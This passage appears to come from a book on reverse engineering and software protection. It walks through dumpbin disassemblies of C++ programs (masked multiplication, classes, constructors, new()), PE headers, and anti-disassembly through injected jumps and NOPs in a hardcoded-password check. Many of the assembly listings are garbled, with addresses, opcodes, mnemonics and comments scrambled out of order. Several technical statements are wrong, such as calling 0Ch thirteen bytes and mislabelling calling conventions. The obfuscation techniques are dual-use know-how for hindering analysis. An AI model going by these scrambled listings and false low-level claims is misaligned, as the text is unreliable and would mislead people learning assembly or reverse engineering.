004010A0: 89 45 F4           mov  dword ptr [ebp-0Ch],eax
004010A3: 68 30 11 40 00     push 401130h
004010A8: 8B 4D F4           mov  ecx,dword ptr [ebp-0Ch]
004010AB: 51                 push ecx
004010AC: 68 B0 40 41 00     push 4140B0h
004010B1: 68 88 5C 41 00     push 415C88h
004010B6: E8 45 09 00 00     call 00401A00
004010BB: 83 C4 08           add  esp,8
004010BE: 8B C8              mov  ecx,eax
004010C0: E8 AB 00 00 00     call 00401170
004010C5: 8B C8              mov  ecx,eax
004010C7: E8 84 00 00 00     call 00401150
004010CC: 33 C0              xor  eax,eax
004010CE: 8B E5              mov  esp,ebp
004010D0: 5D                 pop  ebp
004010D1: C3                 ret
The above scrutiny clarifies a lot about variable handling on the stack at low level. The imul var1_container, var2_container instruction is used for multiplication, where var1_container and var2_container hold the two variables to be multiplied; these containers may be registers or memory locations. But for security reasons the algorithm can be altered to show behavior deviating from the normal, yet yield the expected results with the same precision. This can be achieved by not using the standard operator for the required operation, but using alternative instructions. For example, the multiplication of two variables x and y yielding another variable m can be done in several ways; we are listing two of them here:

m = x * y -----------(1)
And

for (m = 0, x; x > 0; x--)
{
    m += y;
}                -----------(2)
Algorithm (1) can be easily identified at first sight, while algorithm (2) also results in a multiplication and produces the same result. But in the second case the variable x gets decremented and thus suffers a value change. Algorithm (2) can be performed using any kind of loop, or by a flat method for better speed: we can simply add one variable as many times as the value of the other, but then we need their values predefined in the code itself.
/* multalt.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    int m, x=0, y=0;
    cout << "Enter the first number: ";
    cin >> x;
    cout << "Enter the second number: ";
    cin >> y;
    // the second algorithm
    for(m=0, x; x > 0; x--)
        m += y;
    cout << "x * y = " << m << endl;
    return EXIT_SUCCESS;
}
Let us examine the disassembly of the (2) algorithm:
_main:
0040107E: 55                 push ebp
0040107F: 8B EC              mov  ebp,esp
00401081: 83 EC 0C           sub  esp,0Ch
; the above instruction reserves space for 3 DWORD variables.
00401084: C7 45 FC 00 00 00  mov  dword ptr [ebp-4],0
          00
; the variable x is initialized to 0 at ebp-4.
0040108B: C7 45 F8 00 00 00  mov  dword ptr [ebp-8],0
          00
; the variable y is initialized to 0 at ebp-8. The variable m is not
; initialized yet anywhere in the code. Now the cout stub comes into action.
00401092: 68 B0 70 41 00     push 4170B0h
00401097: 68 88 8D 41 00     push 418D88h
0040109C: E8 BF 15 00 00     call 00402660       ; call for cout.
004010A1: 83 C4 08           add  esp,8          ; clearing the stack of the cout function.
; now the cin code stub.
004010A4: 8D 45 FC           lea  eax,[ebp-4]    ; the address of x is loaded into the eax register.
004010A7: 50                 push eax
004010A8: B9 18 8E 41 00     mov  ecx,418E18h
004010AD: E8 8E 06 00 00     call 00401740       ; the call for the cin function.
; again the cout code stub.
004010B2: 68 CC 70 41 00     push 4170CCh
004010B7: 68 88 8D 41 00     push 418D88h
004010BC: E8 9F 15 00 00     call 00402660       ; call for cout.
004010C1: 83 C4 08           add  esp,8
; the second cin code.
004010C4: 8D 4D F8           lea  ecx,[ebp-8]
004010C7: 51                 push ecx
004010C8: B9 18 8E 41 00     mov  ecx,418E18h
004010CD: E8 6E 06 00 00     call 00401740       ; the call for cin.
; from here the for loop begins, and the following is its variable
; initialization.
004010D2: C7 45 F4 00 00 00  mov  dword ptr [ebp-0Ch],0
          00
; now the variable m is initialized to 0 at the ebp-0C position in the stack.
; the next code is the beginning of our second algorithm.
004010D9: EB 09              jmp  004010E4
; the above jump instruction lands in the control section of the loop.
004010DB: 8B 55 FC           mov  edx,dword ptr [ebp-4]
; the variable x [ebp-4] is loaded into the edx register.
004010DE: 83 EA 01           sub  edx,1
; the edx value is decreased by virtue of the decrement operator "--".
004010E1: 89 55 FC           mov  dword ptr [ebp-4],edx
; the decreased value is overwritten on x (i.e. at [ebp-4]).
; all these overwriting instructions can be avoided if pointers are used
; in the higher-level program code; it also speeds up the code execution.
004010E4: 83 7D FC 00        cmp  dword ptr [ebp-4],0
; this is the loop control condition; in the high-level code it is defined
; as x > 0.
004010E8: 7E 0B              jle  004010F5
; jump if the value at ebp-4 (i.e. x) is lower than or equal to 0.
; this jump is followed when the loop ends.
004010EA: 8B 45 F4           mov  eax,dword ptr [ebp-0Ch]
; the value of m is loaded into the eax register.
004010ED: 03 45 F8           add  eax,dword ptr [ebp-8]
; the value at ebp-8 (variable y) is added to the value in the eax register.
004010F0: 89 45 F4           mov  dword ptr [ebp-0Ch],eax
; the eax value is overwritten on the variable m at ebp-0C.
; it resulted from the operator "+=".
004010F3: EB E6              jmp  004010DB
; a jump to the third section of the for loop, i.e. the increment-decrement
; section.
004010F5: 68 A0 11 40 00     push 4011A0h
004010FA: 8B 4D F4           mov  ecx,dword ptr [ebp-0Ch]
; the final result is loaded into the ecx register from location [ebp-0C]
; (i.e. the variable m).
004010FD: 51                 push ecx
; the value in the ecx register, i.e. the variable m, is pushed on the stack
; for the cout function.
004010FE: 68 E8 70 41 00     push 4170E8h
00401103: 68 88 8D 41 00     push 418D88h
00401108: E8 53 15 00 00     call 00402660       ; the cout function call.
0040110D: 83 C4 08           add  esp,8          ; the stack clearing for the cout function.
00401110: 8B C8              mov  ecx,eax
00401112: E8 C9 00 00 00     call 004011E0
00401117: 8B C8              mov  ecx,eax
00401119: E8 A2 00 00 00     call 004011C0
0040111E: 33 C0              xor  eax,eax
00401120: 8B E5              mov  esp,ebp
00401122: 5D                 pop  ebp
00401123: C3                 ret
The above disassembled code has the multiplication completely mangled into loop code and does not employ the imul instruction at all. The next example employs pointers instead of the original variables for the multiplication.
/* mulaptr.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    int m=0, x=0, y=0;
    int *a, *b, *c;
    a = &m;
    b = &x;
    c = &y;
    cout << "Enter the first number: ";
    cin >> x;
    cout << "Enter the second number: ";
    cin >> y;
    for (int i=0; i < *b; i++)
        *a += *c;
    cout << "x * y = " << m << endl;
    return EXIT_SUCCESS;
}
The disassembled code as generated by the dumpbin.exe is shown below:
_main: 0040107E: 55 push ebp 0040107F: 8B EC mov ebp,esp 00401081: 83 EC 1C sub esp,1Ch ; stack worth 28 bytes is reserved. 00401084: C7 45 E4 00 00 00 mov dword ptr [ebp-1Ch],0 00 0040108B: C7 45 F0 00 00 00 mov dword ptr [ebp-10h],0 00 00401092: C7 45 E8 00 00 00 mov dword ptr [ebp-18h],0 00 ; above all the variables, m, x & y are respectively initialized. 00401099: 8D 45 E4 lea eax,[ebp-1Ch] 0040109C: 89 45 FC mov dword ptr [ebp-4],eax 0040109F: 8D 4D F0 lea ecx,[ebp-10h] 004010A2: 89 4D F8 mov dword ptr [ebp-8],ecx 004010A5: 8D 55 E8 lea edx,[ebp-18h] 004010A8: 89 55 F4 mov dword ptr [ebp-0Ch],edx 004010AB: 68 B0 70 41 00 push 4170B0h 004010B0: 68 88 8D 41 00 push 418D88h 004010B5: E8 C6 15 00 00 call 00402680 004010BA: 83 C4 08 add esp,8 004010BD: 8D 45 F0 lea eax,[ebp-10h] 004010C0: 50 push eax 004010C1: B9 18 8E 41 00 mov ecx,418E18h 004010C6: E8 95 06 00 00 call 00401760 004010CB: 68 CC 70 41 00 push 4170CCh 004010D0: 68 88 8D 41 00 push 418D88h 004010D5: E8 A6 15 00 00 call 00402680 004010DA: 83 C4 08 add esp,8 004010DD: 8D 4D E8 lea ecx,[ebp-18h] 004010E0: 51 push ecx 004010E1: B9 18 8E 41 00 mov ecx,418E18h 004010E6: E8 75 06 00 00 call 00401760 004010EB: C7 45 EC 00 00 00 mov dword ptr [ebp-14h],0 00 004010F2: EB 09 jmp 004010FD 004010F4: 8B 55 EC mov edx,dword ptr [ebp-14h] 004010F7: 83 C2 01 add edx,1 004010FA: 89 55 EC mov dword ptr [ebp-14h],edx 004010FD: 8B 45 F8 mov eax,dword ptr [ebp-8] 00401100: 8B 4D EC mov ecx,dword ptr [ebp-14h] 00401103: 3B 08 cmp ecx,dword ptr [eax] 00401105: 7D 11 jge 00401118
00401107: 8B 55 FC           mov  edx,dword ptr [ebp-4]
0040110A: 8B 02              mov  eax,dword ptr [edx]
0040110C: 8B 4D F4           mov  ecx,dword ptr [ebp-0Ch]
0040110F: 03 01              add  eax,dword ptr [ecx]
00401111: 8B 55 FC           mov  edx,dword ptr [ebp-4]
00401114: 89 02              mov  dword ptr [edx],eax
00401116: EB DC              jmp  004010F4
00401118: 68 C0 11 40 00     push 4011C0h
0040111D: 8B 45 E4           mov  eax,dword ptr [ebp-1Ch]
00401120: 50                 push eax
00401121: 68 E8 70 41 00     push 4170E8h
00401126: 68 88 8D 41 00     push 418D88h
0040112B: E8 50 15 00 00     call 00402680
00401130: 83 C4 08           add  esp,8
00401133: 8B C8              mov  ecx,eax
00401135: E8 C6 00 00 00     call 00401200
0040113A: 8B C8              mov  ecx,eax
0040113C: E8 9F 00 00 00     call 004011E0
00401141: 33 C0              xor  eax,eax
00401143: 8B E5              mov  esp,ebp
00401145: 5D                 pop  ebp
00401146: C3                 ret
The code can now be identified; the scrutiny of the earlier example helps in understanding this one. Remember, in mathematics multiplication is the summation of one value as many times as the other. By simply keeping this principle in mind, we can identify that this bunch of code results in a product. Thus, a masked code for the multiplication operator.
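Another common masking of the product, sketched below with our own function name: since a left shift multiplies by two, any multiplication can be decomposed into shifts and additions, so the listing again shows no imul:

```cpp
#include <cassert>

// Multiplies x by y using only shifts and additions (the classic
// shift-and-add scheme), so the disassembly shows shl/shr/add
// instructions instead of imul.
unsigned mul_shift_add(unsigned x, unsigned y)
{
    unsigned m = 0;
    while (y)
    {
        if (y & 1)    // lowest bit of the multiplier set?
            m += x;   // accumulate the current shifted multiplicand
        x <<= 1;      // x = x * 2 (one shl in the listing)
        y >>= 1;      // move to the next bit of the multiplier
    }
    return m;         // e.g. mul_shift_add(6, 7) == 42
}
```

For a reverser, recognizing the shift-and-add pattern is the same exercise as recognizing the loop above: the principle of repeated summation stays visible even when the operator does not.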
The Object Oriented World

It's time to study some modern programming approaches; we mean we are going to discuss object-oriented programming at the lower level. The classes are the most essential parts of object-oriented programming; therefore, the study of OOP is similar to the study of classes. Classes have some definite internal structures, like constructors and destructors, and we'll identify them at the lower level.

Friends, can you differentiate structures from classes? There is no difference; both can be used in each other's place. The difference lies in one aspect: by default, all members of a structure are public if not declared explicitly, while in a class all members are private if not declared public or private explicitly.

There is always a difference between ordinary functions and the object member functions (the class functions). The object member functions are provided with a pointer to the object instance implicitly, and it is the argument pushed on the stack last, meaning that in the argument list it lies at first place, as the leftmost argument (_cdecl convention). This pointer is called the 'this' pointer; no such pointer is provided to the other functions, and no object member function will get a call without the 'this' pointer being parsed into its argument list. The 'this' pointer is prepared in the ECX register by default by the Visual Studio compiler. This is the major difference between the object functions and other functions.

The objects can be declared statically or dynamically; it is not necessary that they are declared explicitly. The object instances are initiated in the instantiation process, and dynamic declaration is also called object instantiation. The statically declared object members (the functions and variables declared in a class) get their calls from direct offsets, similar to other static functions, while dynamically declared object member functions follow the object instantiation process first.
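The implicit 'this' argument can be pictured at source level as an ordinary function taking the object's address explicitly. A minimal sketch of that equivalence (the names are ours; this is an illustration, not what the compiler literally emits):

```cpp
#include <cassert>

// A member function receives the object's address as a hidden argument
// (in ecx under the Visual C++ thiscall scheme).
struct Counter
{
    int value;
    void add(int n) { this->value += n; }   // implicit 'this'
};

// The moral equivalent with the hidden argument made explicit: the
// object pointer is just another parameter of a free function.
void Counter_add(Counter* self, int n) { self->value += n; }
```

Calling `c.add(5)` and `Counter_add(&c, 5)` has the same effect; at the machine level the difference is only in how the object's address reaches the callee.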
The classes have objects of their kind. A constructor initializes all the class members and places a base address for tracking these members; afterwards, all the members get their instantaneous addresses. Remember, a destructor may be virtual or non-virtual, but a constructor will never be virtual. Then there is something like virtual functions, which do not have a constant offset but are tracked by a virtual table, also known as the vtbl. Once everything gets its entry in the virtual table, the destructor may also be listed in it.

Note: we are using VC++ 6.0 in our examples, which is an ideal compiler for all these concepts.
Remember, there exist no classes or objects at the lower level; only object instances exist and remain in the traces, and the 'this' pointer traces the object instances. Or, more generally, things which exist only at the higher level cannot be addressed: an address for nothing never exists, because there should be something existing at that address. The classes and objects are only for human understanding; the OS and the processor have nothing to do with that approach. The processor cannot think and imagine like us, and it does not know what objects are in the real world. The compiler acts as an interpreter who translates the human instructions into processor instructions, and it places only the code which can be understood by the operating system and the processor.

There is always a call for the new () function in object-oriented programs; it is there because something needs to be initialized. The new () function takes only one integer-type argument, mostly 1, and returns a pointer. The compiler may place a check whether a constructor is already defined in the program; the check ensures that the developer-defined constructor is called instead of the plain code generated around new ().

Let's form an ideal example employing the OOP technique and the static object declaration:

/* classex1.cpp */
#include <iostream>
using namespace std;

class myClass
{
public:
    void myFunc();
};

void myClass::myFunc()
{
    cout << "This is an OOP example." << endl;
}

int main (int argc, char* argv[])
{
    myClass exClass;
    exClass.myFunc();
    return EXIT_SUCCESS;
}

Compile the above program using the following command:

CL /Gs classex1.cpp

It will remove all the optimizations from the compiled code. Now disassemble the exe file using dumpbin:

Dumpbin /disasm classex1.exe >classex1.txt

And check the following excerpt of the code from classex1.txt. Note: always start from the code of main.

myFunc:
0040107E: 55              push ebp            ; function prologue.
0040107F: 8B EC           mov  ebp,esp
00401081: 51              push ecx
00401082: 89 4D FC        mov  dword ptr [ebp-4],ecx
00401085: 68 E0 10 40 00  push 4010E0h
0040108A: 68 A0 C0 40 00  push 40C0A0h
0040108F: 68 78 CD 40 00  push 40CD78h
00401094: E8 A7 05 00 00  call 00401640       ; call for the cout function.
00401099: 83 C4 08        add  esp,8
0040109C: 8B C8           mov  ecx,eax
0040109E: E8 5D 00 00 00  call 00401100       ; call for the function generating a new line in
                                              ; the output.
004010A3: 8B E5           mov  esp,ebp
004010A5: 5D              pop  ebp
004010A6: C3              ret
_main:
004010A7: 55              push ebp
004010A8: 8B EC           mov  ebp,esp
004010AA: 51              push ecx
004010AB: 8D 4D FC        lea  ecx,[ebp-4]    ; the 'this' pointer is prepared in the ecx register.
004010AE: E8 CB FF FF FF  call 0040107E       ; the call for myFunc is made directly.
004010B3: 33 C0           xor  eax,eax
004010B5: 8B E5           mov  esp,ebp
004010B7: 5D              pop  ebp            ; function epilogue.
004010B8: C3              ret

But remember that the object instance is a static one; therefore no object instantiation code is generated and the call for myFunc is made directly. Instantiation code will be generated on dynamic declaration of objects. Now let's alter the same program, classex1.cpp, but this time with dynamic object declaration, as follows:

/* classex2.cpp */
#include <iostream>
using namespace std;

class myClass
{
public:
    void myFunc();
};

void myClass::myFunc()
{
    cout << "This is an OOP example." << endl;
}

int main (int argc, char* argv[])
{
    myClass *exClass = new myClass;
    exClass->myFunc();
    return EXIT_SUCCESS;
}
eax ecx.4 . call for myFunc. call 0040107E Let’s create another example employing the constructor and destructor: /* classcds. the code below is preparing the ‘this’ pointer. the epilogue of _main begins. class myClass public: { 85 . type argument and returns an address. . 004010BC: 33 C0 . 004010BE: 8B E5 004010C0: 5D 004010C1: C3 . the return value 0 is prepared in eax register.cpp */ #include <iostream> using namespace std. the object still lies in the memory. 004010AB: 89 45 F8 004010AE: 8B 45 F8 004010B1: 89 45 FC 004010B4: 8B 4D FC mov mov mov mov dword ptr [ebp-8].dword ptr [ebp-4] ..eax eax.eax . mov pop ret esp. . probably the previous function was new (). we should place the object destruction . the this pointer is prepared in ecx register which is an implicit . to avoid such memory leaks. yes! The above line clears out the single argument from the stack. argument for the object instance functions. 004010A8: 83 C4 04 add esp.dword ptr [ebp-8] dword ptr [ebp-4]. . .ebp ebp xor eax. 004010B7: E8 C2 FF FF FF . the _main ends. code. No it’s a memory leak.
myClass(void). } { Compile the above program as: Cl /Gs classcds.esp 86 . char* argv[]) myClass exClass. while the destructor gets call while demolishing the object instance.". that of class class name. C:\access denied\code> We see that the constructor gets the call first automatically and then destructor is called after that the program exits. Well.cpp Let us check the output of above program C:\access denied\code>classcds The constructor gets invoked. // constructors have the same name as // destructors have ~ sign prefixed to cout << "The constructor gets invoked. cout << "\nThe destructor gets invoked.". The destructor gets invoked. myClass::myClass(void) } myClass::~myClass(void) { { ~myClass(void). constructor gets call while object instantiation. return EXIT_SUCCESS. we haven’t called the constructor or destructor in main function. } int main (int argc. }. Let’s check out its disassembled code: constructor: 0040107E: 55 0040107F: 8B EC push mov ebp ebp. But in original program code.
push mov push push call add mov mov pop ret push mov push mov push push call add mov pop ret push mov sub lea call mov lea ecx dword ptr [ebp-4].0 ecx.ecx 40C0A0h 40CD98h 00401100 esp.[ebp-4] .00401081: 51 00401082: 89 4D FC 00401085: 68 A0 C0 40 00 0040108A: 68 98 CD 40 00 0040108F: E8 6 004010A5: 68 C0 C0 40 00 004010AA: 68 98 CD 40 00 004010AF: E8 08 004010C1: 8D 4D FC 004010C4: E8 B5 FF FF FF . .ebp ebp ebp ebp.esp esp. 004010C9: C7 45 F8 00 00 00 00 004010D0: 8D 4D FC .dword ptr [ebp-4] esp. 004010D3: E8 C6 FF FF FF .ebp ebp ebp ebp. once again the ‘this’ pointer is passed to destructor an an implicit call 0040109E 87 . argument. call for constructor. call for destructor.ecx 40C0C0h 40CD98h 00401100 esp.esp ecx dword ptr [ebp-4].8 ecx.8 eax.[ebp-4] 0040107E dword ptr [ebp-8]. the ‘this’ pointer is passed to the constructor through ecx register.8 esp.
dword ptr [ebp-8] . no xor this time for creating return value.004010D8: 8B 45 F8 mov eax. 004010DB: 8B E5 004010DD: 5D 004010DE: C3 mov pop ret esp. it is directly copied from .ebp ebp 88 . stack variable into eax register.
Global Objects

The global objects are declared with the static keyword. Global objects are created in the data section during compile time and differ from other runtime object instantiations in that their instantiation is error free. If objects are declared as global, they are already instantiated in the data section and do not need the constructors to be called. It means no extra memory is needed, which may cause problems if not allotted in other instantiations. Therefore, a check is made in the generated code which blocks the constructor code from being executed. Let's frame an ideal example. Now let us alter the above program with a dynamic object instantiation:

/* classcd.cpp */
#include <iostream>
using namespace std;

class myClass
{
public:
    myClass(void);     // constructors have the same name as that of class
    ~myClass(void);    // destructors have ~ sign prefixed to class name
};

myClass::myClass(void)
{
    cout << "The constructor gets invoked.";
}

myClass::~myClass(void)
{
    cout << "\nThe destructor gets invoked.";
}

int main (int argc, char* argv[])
{
    myClass *exClass = new myClass;
ecx 40C0A0h 40CD98h 00401120 esp. Note: The stack is also called automatic memory. while heap is also called dynamic memory.esp ecx dword ptr [ebp-4]. C:\access denied\code> Only the constructor gets the call.esp ecx dword ptr [ebp-4]. Let’s check out its disassembled code: Constructor: 0040107E: 55 0040107F: 8B EC 00401081: 51 00401082: 89 4D FC 00401085: 68 A0 C0 40 00 0040108A: 68 98 CD 40 00 0040108F: E8 8 push mov push mov ebp ebp.dword ptr [ebp-4] esp.ecx push mov push mov push push call add mov mov pop ret ebp ebp. while destructor is not called at all.return EXIT_SUCCESS.8 eax.ebp ebp 90 . } Let’s check the output of program: C:\access denied\code>classcd The constructor gets invoked. The dynamic instantiation creates the object instances on the heap and heap objects needs a manual call for delete or free function.
004010C3: E8 FF 31 00 00 .4 dword ptr [ebp-8].004010A5: 68 C0 C0 40 00 004010AA: 68 98 CD 40 00 004010AF: E8 0C 004010C1: 6A 01 . call for new function. memory.8 esp.ebp ebp ebp ebp. 004010C8: 83 C4 04 004010CB: 89 45 F8 004010CE: 83 7D F8 00 004010D2: 74 0D 004010D4: 8B 4D F8 004010D7: E8 A2 FF FF FF 004010DC: 89 45 F4 004010DF: EB 07 004010E1: C7 45 F4 00 00 00 00 004010E8: 8B 45 F4 004010EB: 89 45 FC 004010EE: 33 C0 004010F0: 8B E5 004010F2: 5D 004010F3: C3 push push call add mov pop ret push mov sub push 40C0C0h 40CD98h 00401120 esp.0 004010E1 ecx.eax eax.0Ch 1 .ebp ebp 91 . something must be placed in memory for initializing the object in call add mov cmp je mov call mov jmp mov mov mov xor mov pop ret 004042C7 esp.dword ptr [ebp-8] 0040107E dword ptr [ebp-0Ch].esp esp.dword ptr [ebp-0Ch] dword ptr [ebp-4].eax dword ptr [ebp-8].eax esp.0 eax.eax 004010E8 dword ptr [ebp-0Ch].
/* classex3.cpp */
#include <iostream>
using namespace std;

class myClass
{
public:
    myClass(void);     // constructors have the same name as that of class
    ~myClass(void);    // destructors have ~ sign prefixed to class name
    void myFunc();
    int maxim(int a, int b);
};

myClass::myClass(void)
{
    cout << "The constructor gets the call." << endl;
}

myClass::~myClass(void)
{
    cout << "The destructor gets the call." << endl;
}

void myClass::myFunc()
{
    cout << "This is an OOP example.";
}

int myClass::maxim (int a, int b)
{
    return a>b?a:b;
}

int main (int argc, char* argv[])
{
    myClass *exClass = new myClass;
    exClass->myFunc();
    cout << "\nMaximum(5, 6) = " << exClass->maxim(5, 6);
    return EXIT_SUCCESS;
}
eax 00401200 eax.ecx 4011E0h 4140B0h 415CD8h 00401AD0 .ebp ebp push mov push mov push push push call ebp ebp.8 ecx.esp ecx dword ptr [ebp-4]. call to generate the new line in screen display.cpp And disassemble the exe file as: Dumpbin /disasm classex3.txt: Constructor (myClass): 0040107E: 55 0040107F: 8B EC 00401081: 51 00401082: 89 4D FC 00401085: 68 E0 11 40 00 0040108A: 68 B0 40 41 00 0040108F: 68 D8 5C 41 00 00401094: E8 37 0A 00 00 .txt Let’s check out the following block of disassembled code from classex3.dword ptr [ebp-4] esp.compile the above program as: Cl /Gs classex3. 00401099: 83 C4 08 0040109C: 8B C8 0040109E: E8 5D 01 00 00 004010A3: 8B 45 FC 004010A6: 8B E5 004010A8: 5D 004010A9: C3 . Destructor (~myClass): 004010AA: 55 004010AB: 8B EC 004010AD: 51 004010AE: 89 4D FC 004010B1: 68 E0 11 40 00 004010B6: 68 D0 40 41 00 004010BB: 68 D8 5C 41 00 004010C0: E8 0B 0A 00 00 push mov push mov push push push call ebp ebp.ecx 4011E0h 4140D0h 415CD8h 00401AD0 add mov call mov mov pop ret esp.esp ecx dword ptr [ebp-4]. 93 . constructor ends here.exe >classex3. call for cout function.
004010D3: 55 004010D4: 8B EC 004010D6: 51 004010D7: 89 4D FC 004010DA: 68 F0 40 41 00 004010DF: 68 D8 5C 41 00 004010E4: E8 E7 09 00 00 .dword ptr [ebp+8] dword ptr [ebp-8]. . while the first .ebp ebp . destructor ends here.. argument lies at offset of 13 bytes from the stack frame base (ebp) 004010FC: 3B 45 0C . cmp compares two numbers.dword ptr [ebp+0Ch] 94 . this pointer is stored on the stack in a variable. 004010E9: 83 C4 08 004010EC: 8B E5 004010EE: 5D 004010EF: C3 maxim: 004010F0: 55 004010F1: 8B EC 004010F3: 83 EC 08 004010F6: 89 4D FC 004010F9: 8B 45 08 push mov sub mov mov ebp ebp.8 dword ptr [ebp-4]. 8 bytes offset from stack frame base. call for cout function. call to generate the new line in screen display.ebp ebp push mov push mov push push call ebp ebp.dword ptr [ebp+8] add mov pop ret esp.esp esp.ecx 0040110F cmp eax.ecx eax.ecx 4140F0h 415CD8h 00401AD0 add mov call mov pop ret esp.8 esp.esp ecx dword ptr [ebp-4]. 004010FF: 7E 08 00401101: 8B 4D 08 00401104: 89 4D F8 00401107: EB 06 jle mov mov jmp 00401109 ecx. call for cout.eax 00401200 esp. the second argument is placed in eax register which lies at . 004010C5: 83 C4 08 004010C8: 8B C8 004010CA: E8 31 01 00 00 004010CF: 8B E5 004010D1: 5D 004010D2: C3 .8 ecx. .
0040111E: 6A 01 . argument for new () function. .0 push 1 95 .0Ch . as the arguments are being cleared .eax dword ptr [ebp-8]. both Pascal .esp esp.dword ptr [ebp-8] 0040107E dword ptr [ebp-0Ch]. this is __stdcall convention. probably the last call was for new.ebp ebp 8 .dword ptr [ebp-4] 004010D3 mov cmp je mov call mov jmp mov dword ptr [ebp-8].dword ptr [ebp-8] esp. 00401120: E8 C2 57 00 00 00401125: 83 C4 04 call add 004068E7 esp. probably call for new () function. 13 bytes reserved on the stack. and _cdecl are followed.00401109: 8B 55 0C 0040110C: 89 55 F8 0040110F: 8B 45 F8 00401112: 8B E5 00401114: 5D 00401115: C2 08 00 mov mov mov mov pop ret edx. by the called function itself (Pascal convention). the object instantiation has been started. _main: 00401118: 55 00401119: 8B EC 0040111B: 83 EC 0C push mov sub ebp ebp. . while the arguments .dword ptr [ebp+0Ch] dword ptr [ebp-8]. 00401128: 89 45 F8 0040112B: 83 7D F8 00 0040112F: 74 0D 00401131: 8B 4D F8 00401134: E8 45 FF FF FF 00401139: 89 45 F4 0040113C: EB 07 0040113E: C7 45 F4 00 00 00 00 00401145: 8B 45 F4 00401148: 89 45 FC 0040114B: 8B 4D FC 0040114E: E8 80 FF FF FF mov mov mov call eax. are being pushed in __cdecl convention for this function.0 0040113E ecx.edx eax. . cleared only a single argument. __stdcall convention is followed.dword ptr [ebp-0Ch] dword ptr [ebp-4].4 .eax 00401145 dword ptr [ebp-0Ch]. below the ‘this’ pointer is being prepared in ecx register.eax ecx.
because the maxim is a member of object . 0040115F: 50 00401160: 68 08 41 41 00 00401165: 68 D8 5C 41 00 0040116A: E8 61 09 00 00 .eax esp.ebp ebp push push push call eax 414108h 415CD8h 00401AD0 call 004010F0 We observed that the dynamically declared object instances destructor is not executed. class and operates on object instance. 96 ..eax 00401220 eax. the ‘this’ pointer which is the pointer for object instance is being .dword ptr [ebp-4] . pushed on the stack of maxim. call for cout. below the arguments for maxim are being pushed on the stack. 0040116F: 83 C4 08 00401172: 8B C8 00401174: E8 A7 00 00 00 00401179: 33 C0 0040117B: 8B E5 0040117D: 5D 0040117E: C3 add mov call xor mov pop ret esp.8 ecx. 0040115A: E8 91 FF FF FF . call for maxim( 5. 6). 00401153: 6A 06 00401155: 6A 05 00401157: 8B 4D FC push push mov 6 5 ecx.
Surgery of PE Headers

The Windows NT executable files are also termed PE executables, where PE stands for Portable Executable. All PE executables bear an identical structure. A PE file always starts with an MZ header, also known as the DOS stub, which constitutes the beginning of every Windows NT executable. It can be identified easily by the characters "MZ", followed a little later by the string "This program cannot be run in DOS mode…". The PE header, which follows the DOS stub, contains all the information about the executable program. During normal execution in Windows mode the DOS stub is directly crossed over and the execution control lands on the PE header. In DOS mode, by contrast, the line shown above in double quotes is printed on the console screen and the program exits. A careful alteration of the PE header can make the cracking process more tedious and boost the security, but a skillful hacker can still find his path if he bears enough knowledge of the PE header.
Anti-Disassembling Techniques

The disassemblers in this world are not yet smart and intelligent enough: they just translate the machine code into assembly from top to bottom, but do not follow the actual execution path. This fact can be used to fool the disassemblers. Developers can derail the process of cracking the security by injecting false instructions among the normally executing instructions; these always produce a wrong disassembly, leading the crackers down a false path. We can also employ decryption of important parts of the program code during execution; having the code encrypted likewise hardens the cracking process. Remember that these techniques cannot stop a dedicated hacker from achieving his goals, but they can probably slow down the process of cracking. Let us discuss these techniques in detail.
Inserting False Machine Code

The fact is that the intentionally introduced false instructions are not followed during execution, thus there is nearly no difference between the performance of the original program and the one utilizing such anti-disassembling techniques. In this technique we are going to force the disassemblers to produce wrong disassembled assembly code, which can increase the strength of the security code to some degree. We are going to use the same earlier secpass.cpp program for employing this technique here, and modify its code by adding NOP sleds as shown below, giving it the name sechard.cpp.

/* secpass.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    char password[] = "iAMsatisfied";
    char buffPass[21];
    for (int a=1; a <= 3; a++)
    {
        cout << "Enter the password: ";
        cin.getline(buffPass, 21);
        if (strcmp (password, buffPass) == 0)
        {
            system("START");
            exit(0);
        }
        else
        {
            cout << "Login failed." << endl;
        }
    }
    return EXIT_SUCCESS;
}

/* sechard.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    char password[] = "iAMsatisfied";
    char buffPass[21];
    for (int a=1; a <= 3; a++)
    {
        cout << "Enter the password: ";
        cin.getline(buffPass, 21);
        __asm {
            jmp offset lab1
            nop
            nop
        }
lab1:
        if (strcmp (password, buffPass) == 0)
        {
            __asm {
                nop
                jmp offset lab3
                nop
                nop
                nop
            }
lab2:
            system("START");
            exit(0);
            __asm {
                nop
lab3:
                jmp offset lab2
                nop
                nop
                nop
                nop
            }
        }
        else
        {
            cout << "Login failed." << endl;
        }
    }
} The jump instructions along with NOP instructions are placed to control the execution path of the processor.414D00h 004013F0 004010EB eax.exe A part of the main section of disassembled code is shown below: 004010D7: 004010D9: 004010DC: 004010DD: 004010E2: 004010E7: 004010E9: 004010EA: 004010EB: 004010EE: 004010EF: 004010F2: 004010F3: 004010F8: 004010FB: 004010FD: 004010FF: 00401100: 00401102: 00401103: 00401104: 00401105: 0040110A: 0040110F: 00401112: 00401114: 00401119: 0040111A: 0040111C: 0040111D: 0040111E: 6A 8D 52 B9 E8 EB 90 90 8D 50 8D 51 E8 83 85 75 90 EB 90 90 90 68 E8 83 6A E8 90 EB 90 90 90 15 55 E8 00 4D 41 00 09 03 00 00 02 45 E8 4D D4 88 47 00 00 C4 08 C0 23 18 D8 CC C4 00 ED E9 30 41 00 46 00 00 04 45 00 00 push lea push mov call jmp nop nop lea push lea push call add test jne nop jmp nop nop nop push call add push call nop jmp nop nop nop 15h edx.8 eax. Compile the above program and disassemble using following command: Dumpbin /disasm sechard.eax 00401122 0040111A 4130D8h 004057DB esp.[ebp-2Ch] ecx 00405880 esp.[ebp-18h] edx ecx.exe.} return EXIT_SUCCESS.4 0 00405706 00401105 101 . Let us study the disassembly of the sechard.[ebp-18h] eax ecx. but without affecting the performance and the objective of the program. We have to change the NOP instructions to anything so that the disassembled code should be translated wrongly.
